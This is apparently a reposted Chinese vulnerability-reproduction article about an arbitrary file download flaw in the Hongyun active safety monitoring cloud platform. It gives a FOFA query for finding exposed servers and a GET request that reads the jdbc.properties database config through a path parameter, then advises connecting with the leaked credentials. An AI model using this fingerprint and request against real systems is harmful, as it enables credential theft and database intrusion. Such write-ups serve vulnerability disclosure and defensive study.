当前位置: 首页 > news >正文

漏洞复现--鸿运主动安全监控云平台任意文件下载

免责声明:

**文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行
**

一:漏洞描述

深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞,攻击者可通过此漏洞获得登录账号密码,以进行后续测试。

二:漏洞影响版本

鸿运主动安全监控云平台

三:网络空间测绘查询

fofa:
body="./open/webApi.html"

四:漏洞复现

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties
image.png
image.png

五:漏洞利用

读取到数据库账号密码,直接连接
image.png

http://www.lryc.cn/news/189939.html

相关文章:

  • 第二章 物理层 | 计算机网络(谢希仁 第八版)
  • 路由高级特性
  • 【MySQL】数据库排查慢查询、死锁进程排查、预防以及解决方法
  • WSL2下的Docker配置和使用
  • 污水管网水位监测,管网水位监测仪守护城市污水管网运行
  • IDEA插件版本升级和兼容新版本idea
  • Docker 容器应急
  • webservice接口自动化测试
  • 精益生产与MES生产管理系统相互融合
  • (c语言进阶)指针的进阶
  • 用路由器远程维护三菱PLC操作指南
  • FPGA面试题(7)
  • Python接口自动化测试之【测试函数、测试类/测试方法的封装】
  • ROS仿真软件Turtlebot-Gazebo的安装使用以及错误处理[机器人避障]
  • 把excel文件内容转化为json文件
  • 前端 - 将非 jpeg 格式图片转为 jpeg 格式、压缩图片
  • 随着 ChatGPT 凭借 GPT-4V(ision) 获得关注,多模态 AI 不断发展
  • Zookeeper-JavaApI操作
  • Vue2.0打包指定路由前缀
  • [vxe-table] 合并行后滚动错位
  • 动态规划:05不同路径
  • html与css知识点
  • spring boot simple类型cache使用
  • springboot-aop-redis-lua 实现的分布式限流方案
  • C++ realloc()用法及代码示例
  • 【Go】gin框架生成压缩包与下载文件
  • iOS 面试题以及自我理解答案
  • vue实现自定义滚动条
  • 基于Qt C++的工具箱项目源码,含命令行工具、桌面宠物、文献翻译、文件处理工具、医学图像浏览器、插件市场、设置扩展等工具
  • C# AnimeGANv2 人像动漫化